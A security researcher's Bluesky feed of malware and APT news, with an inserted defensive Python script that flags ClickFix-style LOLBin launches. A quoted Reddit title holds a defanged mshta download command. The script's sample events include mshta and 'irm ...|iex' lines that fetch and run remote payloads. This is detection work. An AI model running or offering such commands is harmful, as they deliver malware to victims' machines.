Aryeh Goretsky
@goretsky.bsky.social
@ESET Distinguished Researcher | alum of McAfee, Microsoft MVP, Tribal Voice, Zultys | Mod @Lenovo, @Neowin.Net, Scots Newsletter forums | Intel Insider Council | Repost ≠ endorse
Reposted by Aryeh Goretsky
In H2 2025, #ESETresearch saw a thirtyfold increase in #CloudEyE detections, amounting to more than 100,000 hits over the course of six months. CloudEyE is a #MaaS downloader and cryptor used to conceal and deploy other malware, such as #Rescoms, #Formbook, and #AgentTesla. 1/5
January 6, 2026 at 10:03 AM
Nice.
ThinkMoth update, it's working and full speed PCIe 2.0 is training fine!

it stopped working later but details
January 3, 2026 at 8:23 AM
It was 25 years ago this month that Tribal Voice's PowWow messaging software shut down.

It is just an internet footnote now, but Tribal Voice, which was founded by John McAfee, invented much of the technology used by today's messaging software.
January 3, 2026 at 5:52 AM
Reposted by Aryeh Goretsky
In 2025, #ESETresearch analyzed hundreds of hands-on-keyboard ransomware attacks, mostly hitting manufacturing, construction, retail, technology, and healthcare. Most of these were seen in the US (17%), Spain (5%), and France, Italy, and Canada (4% each). 1/5
December 29, 2025 at 11:46 AM
Reposted by Aryeh Goretsky
#ESETresearch has revisited CVE-2025-50165, a critical remote code execution vulnerability in the WindowsCodecs.dll library when processing JPG images, one of the most widely used image formats. www.welivesecurity.com/en/eset-rese... 1/6
December 23, 2025 at 12:29 PM
Exactly the sort of thing Microsoft should be focusing on—under the hood performance improvements to Windows.
December 23, 2025 at 1:09 AM
Reposted by Aryeh Goretsky
#ESETresearch has discovered a new 🇨🇳-aligned APT group, #LongNosedGoblin. This group focuses on cyberespionage and targets mainly governmental entities in Southeast Asia and Japan. www.welivesecurity.com/en/eset-rese... 1/7
LongNosedGoblin tries to sniff out governmental affairs in Southeast Asia and Japan
ESET researchers discovered a China-aligned APT group, LongNosedGoblin, which uses Group Policy to deploy cyberespionage tools across networks of governmental institutions.
www.welivesecurity.com
December 18, 2025 at 1:08 PM
Russian GRU Orchestrated Cyberattacks on US Airports, Water Systems, and Food Supply, Newly Released Indictment Shows
united24media.com/latest-news/...
via @united24media.com
The US indicts Russian hackers for cyberattacks on critical infrastructure, detailing incidents in Missouri, Texas, and California.
united24media.com
December 14, 2025 at 11:15 PM
Reposted by Aryeh Goretsky
🔴 The US has unsealed an indictment revealing how Russian GRU hackers targeted critical infrastructure, including a Missouri regional airport, water facilities in Texas, Pennsylvania, and Indiana, and a California meat-packing plant.
December 13, 2025 at 11:15 AM
Justice Department Announces Actions to Combat Two Russian State-Sponsored Cyber Criminal Hacking Groups www.justice.gov/opa/pr/justi...
The Justice Department announced two indictments in the Central District of California charging Ukrainian national Victoria Eduardovna Dubranova, 33, also known as Vika, Tory, and SovaSonya, for her r...
www.justice.gov
December 10, 2025 at 5:31 PM
Interesting. Seems ClickFix/Fake CAPTCHA scams are migrating to fake Windows Update messages:
old.reddit.com/r/antivirus/...
What is this "cmd /c start mshta "http[:]//195[.]133[.]9[.]111/swear[.]odd" and how can i deal with this?
Posted in r/antivirus by u/remimages • 1 point and 4 comments
old.reddit.com
December 6, 2025 at 8:18 AM
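The command in the Reddit title above is the usual ClickFix shape: a lure tells the victim to paste a line into the Run dialog, and that line wraps a LOLBin (here mshta) that pulls a remote payload with a misleading file extension. Below is an added detection example written for this page; it is not code from the post, from ESET, or from the Reddit thread. It scores process-creation events for that pattern. The event records, the 203.0.113.x / 198.51.100.x addresses (documentation ranges), and the field names `parent`, `image` and `cmdline` are all constructed for the example.

```python
"""Score process-creation events for ClickFix-style LOLBin launches.

Added example for this page, not code from the original post. The events
below are constructed; `parent`, `image` and `cmdline` are assumed field
names, and the IP addresses come from the RFC 5737 documentation ranges.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# LOLBins that ClickFix lures commonly launch from the Run dialog.
LOLBIN_RE = re.compile(
    r"(?<![\w.])(mshta|powershell|pwsh|rundll32|regsvr32|curl|certutil)(?:\.exe)?\b",
    re.I,
)
# A remote resource on the command line; '|' is excluded so "irm url|iex" splits cleanly.
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"'<>|]+", re.I)
# "cmd /c start <lolbin> ..." is the wrapper victims are told to paste into Win+R.
RUN_WRAPPER_RE = re.compile(r"\bcmd(?:\.exe)?\s+/[ck]\s+start\b", re.I)
# Extensions these hosts are expected to load; anything else (e.g. ".odd") is a tell.
EXPECTED_EXT = {"mshta": (".hta",), "rundll32": (".dll",), "regsvr32": (".dll", ".ocx", ".sct")}


@dataclass
class Finding:
    score: int
    reasons: list = field(default_factory=list)


def score_event(event: dict) -> Optional[Finding]:
    """Return a Finding when a LOLBin is handed a remote URL, else None.

    The score climbs with each ClickFix indicator so that a lone
    'curl https://...' from a service does not trip the alert."""
    cmd = event.get("cmdline", "")
    lolbin = LOLBIN_RE.search(cmd)
    url = URL_RE.search(cmd)
    if not (lolbin and url):
        return None
    binary = lolbin.group(1).lower()
    f = Finding(score=1, reasons=[f"{binary} given remote URL {url.group(0)}"])
    if RUN_WRAPPER_RE.search(cmd):
        f.score += 1
        f.reasons.append("launched through 'cmd /c start' (Run-dialog wrapper)")
    if event.get("parent", "").lower() == "explorer.exe":
        f.score += 1
        f.reasons.append("parent is explorer.exe (typed into Win+R by the user)")
    exts = EXPECTED_EXT.get(binary)
    if exts:
        path = url.group(0).split("?", 1)[0].lower()
        if not path.endswith(exts):
            f.score += 1
            f.reasons.append(f"{binary} fetching a non-{'/'.join(exts)} resource")
    return f


def scan(events, threshold: int = 2):
    """Return (cmdline, Finding) pairs whose score reaches the threshold."""
    hits = []
    for ev in events:
        f = score_event(ev)
        if f and f.score >= threshold:
            hits.append((ev["cmdline"], f))
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": 'cmd /c start mshta "http://203.0.113.10/update.odd"'},
    {"parent": "svchost.exe", "image": "mshta.exe",
     "cmdline": 'mshta.exe "C:\\Program Files\\Vendor\\setup.hta"'},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "irm https://198.51.100.7/x|iex"'},
    {"parent": "services.exe", "image": "curl.exe",
     "cmdline": "curl.exe https://updates.example.com/patch.msi -o patch.msi"},
]

if __name__ == "__main__":
    for cmdline, finding in scan(SAMPLE_EVENTS):
        print(f"[score {finding.score}] {cmdline}")
        for r in finding.reasons:
            print("   -", r)
```

The first and third events are flagged; the local .hta launch and the service-driven curl download are not. In a real pipeline the parent-process and wrapper checks do most of the work, because a legitimate admin script rarely starts from explorer.exe via `cmd /c start`.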
Reposted by Aryeh Goretsky
#ESETresearch analyzed the #Gamaredon VBScript payload recently flagged by @ClearskySec. It wipes registry Run keys, scheduled tasks, and kills processes – however, our assessment is that this is likely to clean researchers’ machines, not a shift to destructive ops. x.com/ClearskySec/... 1/4
x.com
December 5, 2025 at 8:49 AM
Reposted by Aryeh Goretsky
#ESETresearch discovered a new #MuddyWater campaign targeting critical infrastructure in 🇮🇱 Israel and 🇪🇬 Egypt, using a new backdoor – MuddyViper – and a variety of post-compromise tools www.welivesecurity.com/en/eset-rese... 1/7
MuddyWater: Snakes by the riverbank
MuddyWater targets critical infrastructure in Israel and Egypt, relying on custom malware, improved tactics, and a predictable playbook.
www.welivesecurity.com
December 2, 2025 at 11:42 AM
Reposted by Aryeh Goretsky
#ESETresearch is heading to #AVAR2025? Dec 4, Thursday in Kuala Lumpur, 11:00–11:30 MYT.
ESET researchers Anton Cherepanov & Peter Strýček present: "Sniffing Around: Unmasking the LongNosedGoblin operation in Southeast Asia and Japan". 1/3
December 1, 2025 at 1:39 PM
Reposted by Aryeh Goretsky
NEW: Israeli and Arab media have reported that Iran is prepared to expand an Israel-Hezbollah conflict regionally if Israel launches operations against Hezbollah. 🧵(1/4)

Full update: isw.pub/IranUpdate12...

December 2, 2025 at 1:28 AM
I don't normally have a lot to say about my Congressperson Jeff Crank, but kudos to him & his staff for this mailing; the holidays are prime time for scammers to prey on people & this is a good reminder.
Only thing I'd add is a link to @cisa.bsky.social, since so much crime takes place online now.
November 30, 2025 at 9:22 AM
My trip report for #BSides Colorado Springs 2025 computer security conference is now live at goretsky.wordpress.com/2025/11/26/t....

If you don't know what a trip report is, or are interested in what happened at this year's #BSides, perhaps you'll find this of interest.
Trip Report: BSidesCOS 2025
If you go on a business trip, it is to bring value to your employer in some way. As an antivirus researcher, my business trips are typically to conferences, and what I am expected to bring back is kno…
goretsky.wordpress.com
November 26, 2025 at 10:16 PM
Reposted by Aryeh Goretsky
#ESETresearch discovered a unique toolset, QuietEnvelope, targeting the MailGates email protection system of Taiwanese co OpenFind. The toolset was uploaded in an archive, named spam_log.7z, to VirusTotal from Taiwan. It contains Perl scripts, 3 stealthy backdoors, argument runner, and misc files. 1/8
November 24, 2025 at 5:57 PM
My in-depth (~15 page) review of the #Lenovo #ThinkPad X9 15 Gen 1 Aura Edition after 6+ months of use is now up on @neowin.net!

#ThinkPadThursday #LenovoIN
neowin.net Neowin @neowin.net · Nov 21
A deep dive into Lenovo's ThinkPad X9 15 Gen 1 Aura Edition reveals major changes. Is its new design enough to attract new users as well as satisfy long term ones of the brand? Read on to find out! #AI #Laptop #Review #ThinkPad
Six months with the ThinkPad X9 15 Gen 1 Aura Edition
www.neowin.net
November 21, 2025 at 10:12 PM
Reposted by Aryeh Goretsky
#ESETresearch discovered and analyzed a previously undocumented malicious tool for network devices that we have named #EdgeStepper, enabling China-aligned #PlushDaemon APT to perform adversary-in-the-middle to hijack updates to deliver malware. www.welivesecurity.com/en/eset-rese... 1/5
PlushDaemon compromises network devices for adversary-in-the-middle attacks
ESET researchers have discovered a network implant used by the China-aligned PlushDaemon APT group to perform adversary-in-the-middle attacks.
www.welivesecurity.com
November 19, 2025 at 10:12 AM
Looks like @mozilla.org has added a new feature to #Firefox, the ability to search for images via #Google Lens when right-clicking on them.

Anyways, to disable it, go to "about:config" in the address bar and set browser.search.visualSearch.featureGate to "false"
November 17, 2025 at 4:47 AM
Reposted by Aryeh Goretsky
#ESETresearch identified an active campaign distributing #NGate – Android NFC relay malware used for contactless payment fraud – targeting Brazilian users.
It is available for download via fake Google Play sites mimicking 4 major banks and 1 e-commerce app. 1/4
November 6, 2025 at 2:00 PM
David Harley was a brilliant writer, illustrator, and musician. More importantly, he was a good friend, and he will be missed. The world was a much brighter place for having him in it, and his passing diminishes us all.
We are deeply saddened by the passing of David Harley, a brilliant cybersecurity expert, former ESET Senior Research Fellow, author and long-time Virus Bulletin contributor.

David's legacy spans decades of research, writing, and public speaking.

Rest in peace, David. You will be missed. 💙
November 14, 2025 at 3:02 AM
I was a guest on @secureiqlab.bsky.social's Reining in the Cloud #podcast. Listen in as I talk about the end of support for Windows 10 and what that means: www.spreaker.com/episode/wind...
www.spreaker.com
October 28, 2025 at 3:13 AM